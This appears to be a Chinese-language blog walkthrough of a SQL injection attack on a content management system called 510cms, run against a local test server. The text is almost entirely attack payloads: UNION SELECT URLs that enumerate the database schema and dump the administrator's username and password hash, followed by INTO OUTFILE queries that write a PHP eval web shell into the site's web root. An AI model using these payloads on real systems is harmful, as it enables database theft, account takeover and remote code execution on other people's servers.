🔥码云GVP开源项目 12k star Uniapp+ElementUI 功能强大 支持多语言、二开方便! 广告
一: 开始爆库: http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,SCHEMA_NAME,4 from information_schema.SCHEMATA limit 0,1 – limit 1,1出现数据库 510cms 爆表: http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,TABLE_NAME,4 from information_schema.TABLES where TABLE_SCHEMA="510cms" – 爆出后台账号密码数据库表 510_admin 爆列: http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,COLUMN_NAME,4 from information_schema.COLUMNS where TABLE_NAME="510_admin" LIMIT 2,1 – name passwd 爆字段 http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,concat(name,0x3c,passwd),4 from 510_admin – admin<21232f297a57a5a743894a0e4a801fc3 admin/admin 二: ``` into outfile select * from Table into outfile '/路径/文件名' 使用into outfile写入文件需要满足3个条件 1、知道站点物理路径(_SERVER["DOCUMENT_ROOT"]) 2、magic_quotes_gpc()=OFF(phpinfo.php) 3、有足够大的权限(有file权限) ``` 三: ``` 1.Php一句话木马: <?php eval($_POST[CMD])?>' 2.http://127.0.0.1:800/510cms2/news.php?cid=2&listid=&newsid=2 and 1=2 union select 1,2,3,'<?php eval($_POST[CMD])?>' from 510_admin into outfile 'C:\\wwwroot\\510cms2\\b.php' -- 3.select * from Table where cid=2 and newsid=2 and 1=2 union select 1,2,3,'<?php eval($_POST[CMD])?>' from 510_admin into outfile 'C:\\wwwroot\\510cms2\\b.php' ```